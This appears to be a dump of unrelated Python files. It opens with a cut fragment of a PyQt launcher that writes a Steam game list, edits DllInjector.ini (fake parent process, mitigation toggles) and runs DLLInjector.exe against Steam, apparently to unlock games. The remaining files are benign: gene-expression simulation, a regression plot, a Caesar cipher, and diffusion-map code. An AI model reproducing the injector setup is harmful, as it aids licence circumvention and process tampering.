config.check_update = self.main_window.update_checkbox.isChecked()
self.toggle_widget(self.main_window.settings_window)
# Generation Functions
def run_GLR(self):
self.toggle_widget(self.main_window.generic_popup,True)
if not self.generate_app_list(False):
return
args = ["DLLInjector.exe", "-DisablePreferSystem32Images"]
self.replaceConfig("CreateFiles", " 1")
self.replaceConfig("FileToCreate_1", " NoQuestion.bin")
with core.get_config() as config:
config.no_hook = self.main_window.no_hook_checkbox.isChecked()
config.compatibility_mode = self.main_window.compatibility_mode_checkbox.isChecked()
# if : else used instead of ternary operator for better readability
if core.config.compatibility_mode:
self.replaceConfig("EnableMitigationsOnChildProcess"," 0")
else:
self.replaceConfig("EnableMitigationsOnChildProcess"," 1")
if core.config.no_hook:
self.replaceConfig("Exe"," Steam.exe")
self.replaceConfig("WaitForProcessTermination"," 0")
self.replaceConfig("EnableFakeParentProcess"," 1")
self.replaceConfig("CreateFiles", " 2")
self.replaceConfig("FileToCreate_2", " NoHook.bin", True)
else:
self.replaceConfig("Exe"," Steam.exe -inhibitbootstrap")
self.replaceConfig("WaitForProcessTermination"," 1")
self.replaceConfig("EnableFakeParentProcess"," 0")
core.os.chdir(core.config.steam_path)
if self.is_steam_running():
self.toggle_widget(self.main_window.closing_steam)
subprocess.run(["Steam.exe", "-shutdown"]) #Shutdown Steam
while self.is_steam_running():
core.time.sleep(1)
core.time.sleep(1)
subprocess.Popen(args)
self.close()
def generate_app_list(self, popup = True):
selected_profile = profile_manager.profiles[self.main_window.profile_selector.currentText()]
if len(selected_profile.games) == 0:
self.show_popup("No games to generate.", lambda : self.toggle_widget(self.main_window.generic_popup,True))
return False
core.createFiles(selected_profile.games)
if(popup):
self.show_popup("AppList Folder Generated", lambda : self.toggle_widget(self.main_window.generic_popup, True))
return True
# Util Functions
def toggle_hidden(self, widget):
widget.setHidden(not widget.isHidden())
self.repaint()
def toggle_enable(self, widget):
widget.setEnabled(not widget.isEnabled())
def toggle_widget(self, widget, force_close = False):
if force_close:
widget.lower()
widget.setHidden(True)
widget.setEnabled(False)
return
if widget.isHidden():
widget.raise_()
else:
widget.lower()
self.toggle_hidden(widget)
self.toggle_enable(widget)
def set_steam_path(self):
path = self.main_window.steam_path.text()
if not path == "":
with core.get_config() as config:
config.steam_path = path
self.toggle_widget(self.main_window.set_steam_path_window)
def setup_steam_path(self):
if core.config.steam_path != "":
self.main_window.settings_steam_path.setText(core.config.steam_path)
return
self.toggle_widget(self.main_window.set_steam_path_window)
def drop_event_handler(self, event):
self.add_selected()
def show_popup(self, message, callback):
self.main_window.popup_text.setText(message)
self.main_window.popup_btn1.clicked.connect(callback)
self.toggle_widget(self.main_window.generic_popup)
def is_steam_running(self):
for process in psutil.process_iter():
if process.name() == "Steam.exe" or process.name() == "SteamService.exe" or process.name() == "steamwebhelper.exe" or process.name() == "DLLInjector.exe":
return True
return False
def replaceConfig(self, name, new_value, append = False):
found = False
with fileinput.input(core.config.steam_path + "/DllInjector.ini", inplace=True) as fp:
for line in fp:
if not line.startswith("#"):
tokens = line.split("=")
if tokens[0].strip() == name:
found = True
tokens[1] = new_value
line = "=".join(tokens) + "\n"
print(line, end = "")
if append and not found:
with open(core.config.steam_path + "/DllInjector.ini", "at") as f:
f.write("\n{0} = {1}".format(name, new_value))
class SearchThread(QThread):
signal = pyqtSignal('PyQt_PyObject')
def __init__(self, query):
super(SearchThread, self).__init__()
self.query = query
def run(self):
result = core.queryGames(self.query)
self.signal.emit(result)
class TableModel(QAbstractTableModel):
def __init__(self, datain=[], parent=None):
super().__init__(parent=parent)
self.datain = datain
def rowCount(self, parent=QModelIndex()):
return len(self.datain)
def columnCount(self, parent=QModelIndex()):
return 3
def data(self, index: QModelIndex, role=Qt.DisplayRole):
if index.isValid() and role == Qt.DisplayRole:
return f"{self.datain[index.row()][index.column()]}"
if index.column() == 2 and role == Qt.TextAlignmentRole:
return Qt.AlignCenter
else:
return QVariant()
def headerData(self, index, QtOrientation, role=Qt.DisplayRole):
names = ["Id", "Name", "Type"]
if role == Qt.DisplayRole:
return names[index]
else:
return QVariant()
def flags(self, index):
if index.column() == 1:
return Qt.ItemIsEnabled | Qt.ItemIsSelectable | Qt.ItemIsDragEnabled
else:
return Qt.ItemIsEnabled | Qt.ItemIsSelectable |
<filename>archive/scripts/functions/generate_data.py
'''
Author: <NAME>
Date Created: 30 August 2019
Scripts to generate simulated data, simulated data with different numbers of experiments, permuted version of simulated data
'''
import os
import ast
import pandas as pd
import numpy as np
import random
import glob
import pickle
from keras.models import load_model
from sklearn import preprocessing
import warnings
warnings.filterwarnings(action='ignore')
from numpy.random import seed
randomState = 123
def get_sample_ids(experiment_id):
'''
Return sample ids for a given experiment id
'''
base_dir = os.path.abspath(os.path.join(os.getcwd(), "../.."))
# metadata file
mapping_file = os.path.join(
base_dir,
"data",
"metadata",
"sample_annotations.tsv")
# Read in metadata
metadata = pd.read_table(
mapping_file,
header=0,
sep='\t',
index_col=0)
selected_metadata = metadata.loc[experiment_id]
sample_ids = list(selected_metadata['ml_data_source'])
return sample_ids
def simulate_compendium(
experiment_ids_file,
num_simulated_experiments,
normalized_data_file,
NN_architecture,
analysis_name
):
'''
Generate simulated data by randomly sampling some number of experiments
and linearly shifting the gene expression in the VAE latent space.
Workflow:
1. Input gene expression data from 1 experiment (here we are assuming
that there is only biological variation within this experiment)
2. Encode this input into a latent space using the trained VAE model
3. For each encoded feature, sample from a distribution using the
the mean and standard deviation for that feature
4. Decode the samples
Arguments
----------
experiment_ids_file: str
File containing all cleaned experiment ids
number_simulated_experiments: int
Number of experiments to simulate
normalized_data_file: str
File containing normalized gene expression data
------------------------------| PA0001 | PA0002 |...
05_PA14000-4-2_5-10-07_S2.CEL | 0.8533 | 0.7252 |...
54375-4-05.CEL | 0.7789 | 0.7678 |...
... | ... | ... |...
NN_architecture: str
Name of neural network architecture to use.
Format 'NN_<intermediate layer>_<latent layer>'
analysis_name: str
Name of analysis. Format 'analysis_<int>'
Returns
--------
simulated_data_file: str
File containing simulated gene expression data
'''
seed(randomState)
# Create directory to output simulated data
base_dir = os.path.abspath(os.path.join(os.getcwd(), "../.."))
local_dir = os.path.abspath(os.path.join(os.getcwd(), "../../../.."))
new_dir = os.path.join(local_dir, "Data", "Batch_effects", "simulated")
analysis_dir = os.path.join(new_dir, analysis_name)
if os.path.exists(analysis_dir):
print('Directory already exists: \n {}'.format(analysis_dir))
else:
print('Creating new directory: \n {}'.format(analysis_dir))
os.makedirs(analysis_dir, exist_ok=True)
print('\n')
# Files
NN_dir = base_dir + "/models/" + NN_architecture
latent_dim = NN_architecture.split('_')[-1]
model_encoder_file = glob.glob(os.path.join(
NN_dir,
"*_encoder_model.h5"))[0]
weights_encoder_file = glob.glob(os.path.join(
NN_dir,
"*_encoder_weights.h5"))[0]
model_decoder_file = glob.glob(os.path.join(
NN_dir,
"*_decoder_model.h5"))[0]
weights_decoder_file = glob.glob(os.path.join(
NN_dir,
"*_decoder_weights.h5"))[0]
# Load saved models
loaded_model = load_model(model_encoder_file)
loaded_decode_model = load_model(model_decoder_file)
loaded_model.load_weights(weights_encoder_file)
loaded_decode_model.load_weights(weights_decoder_file)
# Read data
experiment_ids = pd.read_table(
experiment_ids_file,
header=0,
sep='\t',
index_col=0)
normalized_data = pd.read_table(
normalized_data_file,
header=0,
sep='\t',
index_col=0).T
print("Normalized gene expression data contains {} samples and {} genes".format(
normalized_data.shape[0], normalized_data.shape[1]))
# Simulate data
simulated_data_df = pd.DataFrame()
for i in range(num_simulated_experiments):
selected_experiment_id = np.random.choice(
experiment_ids['experiment_id'], size=1)[0]
# Get corresponding sample ids
sample_ids = get_sample_ids(selected_experiment_id)
# Remove any missing sample ids
sample_ids = list(filter(str.strip, sample_ids))
# Remove any sample_ids that are not found in gene expression data
# There are some experiments where most samples have gene expression but a few do not
sample_ids = [
sample for sample in sample_ids if sample in normalized_data.index]
# Gene expression data for selected samples
selected_data_df = normalized_data.loc[sample_ids]
# Encode selected experiment into latent space
data_encoded = loaded_model.predict_on_batch(selected_data_df)
data_encoded_df = pd.DataFrame(
data_encoded, index=selected_data_df.index)
# Get centroid of original data
centroid = data_encoded_df.mean(axis=0)
# Add individual vectors(centroid, sample point) to new_centroid
# Encode original gene expression data into latent space
data_encoded_all = loaded_model.predict_on_batch(
normalized_data)
data_encoded_all_df = pd.DataFrame(
data_encoded_all, index=normalized_data.index)
data_encoded_all_df.head()
# Find a new location in the latent space by sampling from the latent space
encoded_means = data_encoded_all_df.mean(axis=0)
encoded_stds = data_encoded_all_df.std(axis=0)
latent_dim = int(latent_dim)
new_centroid = np.zeros(latent_dim)
for j in range(latent_dim):
new_centroid[j] = np.random.normal(
encoded_means[j], encoded_stds[j])
shift_vec_df = new_centroid - centroid
simulated_data_encoded_df = data_encoded_df.apply(
lambda x: x + shift_vec_df, axis=1)
# Decode simulated data into raw gene space
simulated_data_decoded = loaded_decode_model.predict_on_batch(
simulated_data_encoded_df)
simulated_data_decoded_df = pd.DataFrame(simulated_data_decoded,
index=simulated_data_encoded_df.index,
columns=selected_data_df.columns)
# Add experiment label
simulated_data_decoded_df["experiment_id"] = selected_experiment_id + \
"_" + str(i)
# Concatenate dataframe per experiment together
simulated_data_df = pd.concat(
[simulated_data_df, simulated_data_decoded_df])
# re-normalize per gene 0-1
simulated_data_numeric_df = simulated_data_df.drop(
columns=['experiment_id'], inplace=False)
simulated_data_scaled = preprocessing.MinMaxScaler(
).fit_transform(simulated_data_numeric_df)
simulated_data_scaled_df = pd.DataFrame(simulated_data_scaled,
columns=simulated_data_numeric_df.columns,
index=simulated_data_numeric_df.index)
simulated_data_scaled_df['experiment_id'] = simulated_data_df['experiment_id']
# If sampling with replacement, then there will be multiple sample ids that are the same
# therefore we want to reset the index.
simulated_data_scaled_df.reset_index(drop=True, inplace=True)
print(simulated_data_scaled_df.shape)
# Remove expression data for samples that have duplicate sample id across
# different experiment ids
# We remove these because we are not sure which experiment the sample should
# belong to
# simulated_data_scaled_df = simulated_data_scaled_df.loc[~simulated_data_scaled_df.index.duplicated(
# keep=False)]
print("Return: simulated gene expression data containing {} samples and {} genes".format(
simulated_data_scaled_df.shape[0], simulated_data_scaled_df.shape[1]))
# Save
simulated_data_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"simulated",
analysis_name,
"simulated_data.txt.xz")
simulated_data_scaled_df.to_csv(
simulated_data_file, float_format='%.3f', sep='\t', compression='xz')
def simulate_data(
normalized_data_file,
NN_architecture,
analysis_name,
num_simulated_samples
):
'''
Generate simulated data by sampling from VAE latent space.
Workflow:
1. Input gene expression data from 1 experiment (here we are assuming
that there is only biological variation within this experiment)
2. Encode this input into a latent space using the trained VAE model
3. For each encoded feature, sample from a distribution using the
the mean and standard deviation for that feature
4. Decode the samples
Arguments
----------
normalized_data_file: str
File containing normalized gene expression data
------------------------------| PA0001 | PA0002 |...
05_PA14000-4-2_5-10-07_S2.CEL | 0.8533 | 0.7252 |...
54375-4-05.CEL | 0.7789 | 0.7678 |...
... | ... | ... |...
NN_architecture: str
Name of neural network architecture to use.
Format 'NN_<intermediate layer>_<latent layer>'
analysis_name: str
Name of analysis. Format 'analysis_<int>'
number_simulated_samples: int
Number of samples to simulate
Returns
--------
simulated_data_file: str
File containing simulated gene expression data
'''
seed(randomState)
# Create directory to output simulated data
base_dir = os.path.abspath(os.path.join(os.getcwd(), "../.."))
local_dir = os.path.abspath(os.path.join(os.getcwd(), "../../../.."))
new_dir = os.path.join(local_dir, "Data", "Batch_effects", "simulated")
analysis_dir = os.path.join(new_dir, analysis_name)
if os.path.exists(analysis_dir):
print('Directory already exists: \n {}'.format(analysis_dir))
else:
print('Creating new directory: \n {}'.format(analysis_dir))
os.makedirs(analysis_dir, exist_ok=True)
print('\n')
# Files
NN_dir = base_dir + "/models/" + NN_architecture
model_encoder_file = glob.glob(os.path.join(
NN_dir,
"*_encoder_model.h5"))[0]
weights_encoder_file = glob.glob(os.path.join(
NN_dir,
"*_encoder_weights.h5"))[0]
model_decoder_file = glob.glob(os.path.join(
NN_dir,
"*_decoder_model.h5"))[0]
weights_decoder_file = glob.glob(os.path.join(
NN_dir,
"*_decoder_weights.h5"))[0]
# Load saved models
loaded_model = load_model(model_encoder_file)
loaded_decode_model = load_model(model_decoder_file)
loaded_model.load_weights(weights_encoder_file)
loaded_decode_model.load_weights(weights_decoder_file)
# Read data
normalized_data = pd.read_table(
normalized_data_file,
header=0,
sep='\t',
index_col=0).T
print("Normalized gene expression data contains {} samples and {} genes".format(
normalized_data.shape[0], normalized_data.shape[1]))
# Simulate data
# Encode into latent space
data_encoded = loaded_model.predict_on_batch(normalized_data)
data_encoded_df = pd.DataFrame(data_encoded, index=normalized_data.index)
latent_dim = data_encoded_df.shape[1]
# Get mean and standard deviation per encoded feature
encoded_means = data_encoded_df.mean(axis=0)
encoded_stds = data_encoded_df.std(axis=0)
# Generate samples
new_data = np.zeros([num_simulated_samples, latent_dim])
for j in range(latent_dim):
# Use mean and std for feature
new_data[:, j] = np.random.normal(
encoded_means[j], encoded_stds[j], num_simulated_samples)
# Use standard normal
# new_data[:,j] = np.random.normal(0, 1, num_simulated_samples)
new_data_df = pd.DataFrame(data=new_data)
# Decode samples
new_data_decoded = loaded_decode_model.predict_on_batch(new_data_df)
simulated_data = pd.DataFrame(data=new_data_decoded)
print("Return: simulated gene expression data containing {} samples and {} genes".format(
simulated_data.shape[0], simulated_data.shape[1]))
# Output
# return simulated_data
simulated_data_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"simulated",
analysis_name,
"simulated_data.txt.xz")
simulated_data.to_csv(
simulated_data_file, float_format='%.3f', sep='\t', compression='xz')
def permute_data(simulated_data_file,
local_dir,
analysis_name):
'''
Permute the simulated data
Arguments
----------
simulated_data: df
Dataframe containing simulated gene expression data
local_dir: str
Parent directory containing data files
analysis_name: str
Name of analysis. Format 'analysis_<int>'
Returns
--------
permuted_simulated_data_file: str
File containing permuted simulated gene expression data
to be used as a negative control in similarity analysis.
'''
seed(randomState)
# Read in data
simulated_data = pd.read_table(
simulated_data_file,
header=0,
index_col=0,
sep='\t')
if "experiment_id" in list(simulated_data.columns):
simulated_data.drop(columns="experiment_id", inplace=True)
# Shuffle values within each sample (row)
# Each sample treated independently
shuffled_simulated_arr = []
num_samples = simulated_data.shape[0]
for i in range(num_samples):
row = list(simulated_data.values[i])
shuffled_simulated_row = random.sample(row, len(row))
shuffled_simulated_arr.append(shuffled_simulated_row)
shuffled_simulated_data = pd.DataFrame(shuffled_simulated_arr,
index=simulated_data.index,
columns=simulated_data.columns)
# Output
# return shuffled_simulated_data
permuted_simulated_data_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"simulated",
analysis_name,
"permuted_simulated_data.txt.xz")
shuffled_simulated_data.to_csv(
permuted_simulated_data_file, float_format='%.3f', sep='\t', compression='xz')
def add_experiments(
simulated_data_file,
num_experiments,
local_dir,
analysis_name):
'''
Say we are interested in identifying genes that differentiate between
disease vs normal states. However our dataset includes samples from
different tissues or time points and there are variations
in gene expression that are due to these other conditions
and do not have to do with disease state.
These non-relevant variations in the data are called batch effects.
We want to model these batch effects. To do this we will:
1. Partition our simulated data into n batches
2. For each partition we will shift all genes using a vector of values
sampled from a gaussian distribution centered around 0.
3. Repeat this for each partition
4. Append all batch effect partitions together
Arguments
----------
simulated_data: df
Dataframe containing simulated gene expression data
num_experiments: list
List of different numbers of experiments to add to
simulated data
local_dir: str
Parent directory containing data files
analysis_name: str
Name of analysis. Format 'analysis_<int>'
Returns
--------
Files of simulated data with different numbers of experiments added.
Each file named as "Experiment_<number of experiments added>"
'''
seed(randomState)
# Create directories
new_dir = os.path.join(
local_dir,
"Data",
"Batch_effects",
"experiment_simulated")
analysis_dir = os.path.join(new_dir, analysis_name)
if os.path.exists(analysis_dir):
print('Directory already exists: \n {}'.format(analysis_dir))
else:
print('Creating new directory: \n {}'.format(analysis_dir))
os.makedirs(analysis_dir, exist_ok=True)
print('\n')
# Read in data
simulated_data = pd.read_table(
simulated_data_file,
header=0,
index_col=0,
compression='xz',
sep='\t')
# Add batch effects
num_simulated_samples = simulated_data.shape[0]
num_genes = simulated_data.shape[1]
# Create an array of the simulated data indices
simulated_ind = np.array(simulated_data.index)
for i in num_experiments:
print('Creating simulated data with {} experiments..'.format(i))
experiment_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"experiment_simulated",
analysis_name,
"Experiment_" + str(i) + ".txt.xz")
experiment_map_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"experiment_simulated",
analysis_name,
"Experiment_map_" + str(i) + ".txt.xz")
# Create dataframe with grouping
experiment_data_map = simulated_data.copy()
if i == 1:
simulated_data.to_csv(experiment_file, sep='\t', compression='xz')
# Add experiment id to map dataframe
experiment_data_map['experiment'] = str(i)
experiment_data_map_df = pd.DataFrame(
data=experiment_data_map['experiment'], index=simulated_ind.sort())
experiment_data_map_df.to_csv(
experiment_map_file, sep='\t', compression='xz')
else:
experiment_data = simulated_data.copy()
# Shuffle indices
np.random.shuffle(simulated_ind)
# Partition indices to batch
# Note: 'array_split' will chunk data into almost equal sized chunks.
# Returns arrays of size N % i and one array with the remainder
partition = np.array_split(simulated_ind, i)
for j in range(i):
# Scalar to shift gene expressiond data
stretch_factor = np.random.normal(0.0, 0.2, [1, num_genes])
# Tile stretch_factor to be able to add to batches
num_samples_per_experiment = len(partition[j])
stretch_factor_tile = pd.DataFrame(
pd.np.tile(
stretch_factor,
(num_samples_per_experiment, 1)),
index=experiment_data.loc[partition[j].tolist()].index,
columns=experiment_data.loc[partition[j].tolist()].columns)
# Add experiments
experiment_data.loc[partition[j].tolist(
)] = experiment_data.loc[partition[j].tolist()] + stretch_factor_tile
# Add experiment id to map dataframe
experiment_data_map.loc[partition[j], 'experiment'] = str(j)
experiment_data_map_df = pd.DataFrame(
data=experiment_data_map['experiment'], index=simulated_ind.sort())
# Save
experiment_data.to_csv(
experiment_file, float_format='%.3f', sep='\t', compression='xz')
experiment_data_map_df.to_csv(
experiment_map_file, sep='\t', compression='xz')
def add_experiments_grped(
simulated_data_file,
num_partitions,
local_dir,
analysis_name):
'''
Say we are interested in identifying genes that differentiate between
disease vs normal states. However our dataset includes samples from
different tissues or time points and there are variations
in gene expression that are due to these other conditions
and do not have to do with disease state.
These non-relevant variations in the data are called batch effects.
We want to model these batch effects. To do this we will:
1. Partition our simulated data into n batches
Here we are keeping track of experiment id and partitioning
such that all samples from an experiment are in the same
partition.
Note: Partition sizes will be different since experiment
sizes are different per experiment.
2. For each partition we will shift all genes using a vector of values
sampled from a gaussian distribution centered around 0.
3. Repeat this for each partition
4. Append all batch effect partitions together
Arguments
----------
simulated_data_file: str
File containing simulated gene expression data
num_partitions: list
List of different numbers of partitions to add
technical variations to
local_dir: str
Parent directory containing data files
analysis_name: str
Name of analysis. Format 'analysis_<int>'
Returns
--------
Files of simulated data with different numbers of experiments added.
Each file named as "Experiment_<number of experiments added>"
'''
seed(randomState)
# Create directories
new_dir = os.path.join(
local_dir,
"Data",
"Batch_effects",
"partition_simulated")
analysis_dir = os.path.join(new_dir, analysis_name)
if os.path.exists(analysis_dir):
print('Directory already exists: \n {}'.format(analysis_dir))
else:
print('Creating new directory: \n {}'.format(analysis_dir))
os.makedirs(analysis_dir, exist_ok=True)
print('\n')
# Read in data
simulated_data = pd.read_table(
simulated_data_file,
header=0,
index_col=0,
compression='xz',
sep='\t')
# Add batch effects
num_genes = simulated_data.shape[1] - 1
# Create an array of the simulated data indices
simulated_ind = np.array(simulated_data.index)
for i in num_partitions:
print('Creating simulated data with {} partitions..'.format(i))
partition_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"partition_simulated",
analysis_name,
"Partition_" + str(i) + ".txt.xz")
partition_map_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"partition_simulated",
analysis_name,
"Partition_map_" + str(i) + ".txt.xz")
# Create dataframe with grouping
partition_data_map = simulated_data.copy()
if i == 1:
simulated_data_out = simulated_data.drop(columns="experiment_id")
simulated_data_out.to_csv(
partition_file, sep='\t', compression='xz')
# Add experiment id to map dataframe
partition_data_map['partition'] = str(i)
partition_data_map_df = pd.DataFrame(
data=partition_data_map['partition'], index=simulated_ind.sort())
partition_data_map_df.to_csv(
partition_map_file, sep='\t', compression='xz')
else:
partition_data = simulated_data.copy()
# Shuffle experiment ids
experiment_ids = simulated_data["experiment_id"].unique()
np.random.shuffle(experiment_ids)
# Partition experiment ids
# Note: 'array_split' will chunk data into almost equal sized chunks.
# Returns arrays of size N % i and one array with the remainder
partition = np.array_split(experiment_ids, i)
for j in range(i):
# Randomly select experiment ids
selected_experiment_ids = partition[j]
# Get sample ids associated with experiment ids
sample_ids = list(simulated_data[simulated_data["experiment_id"].isin(
partition[j])].index)
# Scalar to shift gene expressiond data
stretch_factor = np.random.normal(0.0, 0.2, [1, num_genes])
# Tile stretch_factor to be able to add to batches
num_samples_per_partition = len(sample_ids)
if j == 0:
# Drop experiment_id label to do calculation
partition_data.drop(columns="experiment_id", inplace=True)
stretch_factor_tile = pd.DataFrame(
pd.np.tile(
stretch_factor,
(num_samples_per_partition, 1)),
index=partition_data.loc[sample_ids].index,
columns=partition_data.loc[sample_ids].columns)
# Add noise to partition
partition_data.loc[sample_ids] = partition_data.loc[sample_ids] + \
stretch_factor_tile
# Add partition id to map dataframe
partition_data_map.loc[sample_ids, 'partition'] = str(j)
partition_data_map_df = pd.DataFrame(
data=partition_data_map['partition'], index=simulated_ind.sort())
# Save
partition_data.to_csv(
partition_file, float_format='%.3f', sep='\t', compression='xz')
partition_data_map_df.to_csv(
partition_map_file, sep='\t', compression='xz')
|
<filename>cpm/plot_cpm.py
import Data as dt
import Client as client
import matplotlib.pyplot as plt
from matplotlib import gridspec
import vispy.plot as vp
import numpy as np
from vispy.color import ColorArray
from mpl_toolkits.mplot3d import axes3d
if __name__ == "__main__":
# load the data
# fields = ['n_tokens_title','n_tokens_content','n_non_stop_unique_tokens', 'n_unique_tokens']
fields = ['Temperature', 'Exhaust_Vacuum', 'Ambient_Pressure', 'Relative_Humidity', 'energy_output']
fields = ['Temperature', 'energy_output']
# fields = ['Exhaust_Vacuum','Relative_Humidity','energy_output']
y_column = 1 # should be the order in the input file, not in the "fields" order.
# data = dt.load_csv("datasets/OnlineNewsPopularity1.csv",fields,y_column)
data = dt.load_csv("datasets/6CCPP/Folds5x2_pp.csv", fields, y_column)
global training_data_model
training_data_model, training_data_classifier, testing_data = dt.split_data(data)
training_data_model = training_data_model # .get_before(500)
training_data_classifier = training_data_classifier # .get_before(500)
testing_data = testing_data # .get_before(500)
'''
fig = vp.Fig(show=False)
color = (0.8, 0.25, 0.)
fig1 = fig[0,0]
fig1.plot(c, symbol='o',width=0.0, marker_size=2.,color=r,face_color= g,edge_color=blue)
'''
# fig.show(run=True)
models = client.deploy_all_models(training_data_model)
answers_for_classifier = client.get_predictions_to_build_classifier(training_data_classifier)
print(answers_for_classifier[0].NRMSE())
print(answers_for_classifier[1].NRMSE())
print(answers_for_classifier[2].NRMSE())
print(answers_for_classifier[3].NRMSE())
# print(answers_for_classifier[4].NRMSE())
index = [0, 1, 2, 3]
# index = [1,2]
# index = None
y_classifier, errors = client.init_classifier_training_values(answers_for_classifier, model_selection_index=index,
factor=1)
#####classifier = client.select_classifiers(training_data_classifier, y_classifier, testing_data)
classifier = client.build_classifier_rbf(training_data_classifier, y_classifier, 100)
predictions_classified = client.get_classified_predictions(classifier, testing_data)
print(predictions_classified.NRMSE())
answers_for_testing = client.get_predictions_from_models_for_testing(testing_data)
print(answers_for_testing[0].NRMSE())
print(answers_for_testing[1].NRMSE())
print(answers_for_testing[2].NRMSE())
print(answers_for_testing[3].NRMSE())
# print(answers_for_testing[4].NRMSE())
y_classifier, errors = client.init_classifier_training_values(answers_for_testing, model_selection_index=index,
factor=1)
a = np.array(testing_data.features)
# b = np.array([np.array(training_data_model.labels)])
# print(b)
b = np.array(y_classifier).reshape(1, -1)
# print(a)
# print(b)
c = np.concatenate((a, b.T), axis=1)
#plot_classified_prediction_curves_2D(predictions_classified)
|
"""
CaesarCipherEncrypter v1.0
by 050644zf
Lisence: CC0
"""
upAlp=('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')
loAlp=('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z')
alp=('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z')
def shift(v):
try:
n=list(range(52))
d={}
upAlp=('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')
loAlp=('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z')
alp=('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z')
for i in range(26):
n[i]=i+v
n[i+26]=i+v+26
if n[i]>25:
n[i]-=26
n[i+26]-=26
elif n[i]<0:
n[i]+=26
n[i+26]+=26
for i in range(52):
d[alp[i]]=alp[n[i]]
return d
except:
print("Invaild Input")
#main
print("Welcome to use the Caesar Cipher Encrypter.")
print("="*16)
ofPath=input("Origin text path: ")
of=open(ofPath,"r")
s=len(of.read())
of=open(ofPath,"r")
efPath=input("Encrypted Text Name: ")+".txt"
ef=open(efPath,"a")
ef.close()
ef=open(efPath,"r")
while len(ef.read())!=0:
print("The file "+efPath+" already exist. Do you want to overwrite it?(Y/N):")
if input()=="N":
print("Please input a new name:")
efPath=input("Encrypted Text Name: ")+".txt"
else:
ef.close()
open(efPath,"w")
ef.close()
break
ef=open(efPath,"r")
ef.close()
ef=open(efPath,"a")
dict=shift(int(input("Shift Value (Integer Only): ")))
for i in range(s):
ot=of.read(1)
if ot in dict:
ef.write(dict[ot])
else:
ef.write(ot)
of.close()
ef.close()
print("Encrypt Complete!")
|
# Compute the embedding
# ***************************************************************@
import numpy as np
from manifolder_helper import eigs_like_matlab
###
### Part I
###
## Configuration
m = 4000 # starting point for sequantial processing/extension
data = z_mean.T # set the means as the input set
M = data.shape[0]
# Choose subset of examples as reference
# this is 'take m (4000) random values from z_mean, and sort them
# subidx = sort(randperm(size(z_mean, 2), m))
# Choose first m examples as reference (commented out, don't do this
# subidx = 1:m;
subidx = np.arange(z_mean.shape[1])
np.random.shuffle(subidx) # shuffle is inplace in python
subidx = subidx[:m] # take a portion of the data
subidx.sort() # sort is also in place ...
# dataref = data(subidx,:)
dataref = data[subidx, :]
##
# Affinity matrix computation
print('computing Dis matrix ', end='', flush=True)
waitbar_increments = m // 10
Dis = np.zeros((M, m))
for j in range(m):
if j % waitbar_increments == 0:
print('.', end='')
# waitbar(j / m, h) # printing in stead of waitbar
# tmp1 = inv_c(:,:,subidx(j)) * dataref(j,:)' # is 40 x 1 in MATLAB
tmp1 = inv_c[:, :, subidx[j]] @ dataref[j, :].T # 40, in Python
a2 = np.dot(dataref[j, :], tmp1) # a2 is a scalar
b2 = np.sum(data * (inv_c[:, :, subidx[j]] @ data.T).T, 1)
ab = data @ tmp1 # only @ works here
# this tiles the matrix ... repmat is like np.tile
# Dis[:,j] = repmat[a2, M, 1] + b2 - 2*ab
Dis[:, j] = (np.tile(a2, [M, 1])).flatten() + b2 - 2*ab
print('done!')
## Anisotropic kernel
print('aniostropic kernel ... ', end='')
ep = np.median(np.median(Dis, 0)) # default scale - should be adjusted for each new realizations
A = np.exp(-Dis / (4*ep)) # is numpy okay with exponential of matrices? okay, calculates them individually
W_sml = A.T @ A
d1 = np.sum(W_sml, 0)
A1 = A / np.tile(np.sqrt(d1), [M, 1])
W1 = A1.T @ A1
d2 = np.sum(W1, 0)
A2 = A1 / np.tile(np.sqrt(d2), [M, 1])
W2 = A2.T @ A2
D = np.diag(np.sqrt(1 / d2))
###
### Part II
###
# Compute eigenvectors
# in numpy,
# from numpy import linalg as LA
# w, v = LA.eig(np.diag((1, 2, 3)))
# v are the values, diagonal in a matrix, and w are the eigenvectors
# [V, E] = eigs(W2, 10) Matlab
V, E = eigs_like_matlab(W2, 10) # think this is correct now ...
#print('V.shape', V.shape)
#print('E.shape', E.shape)
# python np.sum(A,0) <=> matlab sum(A)
# in matlab, srted are the values of sum(E) sorted (in descending order)
# and IE are the indices that sorted them
# [srtdE, IE] = sort(sum(E), 'descend')
# this is python eqivalent ... note that IE will have values one less than the MATLAB, because zero indexing
# TODO - is this sorted right?
IE = np.sum(E, 0).argsort()[::-1] # find the indices to sort, and reverse them
srtdE = np.sum(E, 0)[IE]
# Phi = D @ V(:, IE(1, 2:10))
Phi = D @ V[:, IE[1:]]
print('done')
###
### Part III
###
# TODO - not necessary? (Independent coordinates?)
# Extend reference embedding to the entire set
print('extending embedding (building Psi) ... ', end='', flush=True)
Psi_list = [] # holds all the psi_i values
omega = np.sum(A2, 1)
A2_nrm = A2 / np.tile(omega.reshape([-1, 1]), [1, m]) # omega needed to be shaped as a column
# for i=1:size(Phi,2)
for i in range(Phi.shape[1]):
# this line is strange ... order of operations for @?, what is the offset?
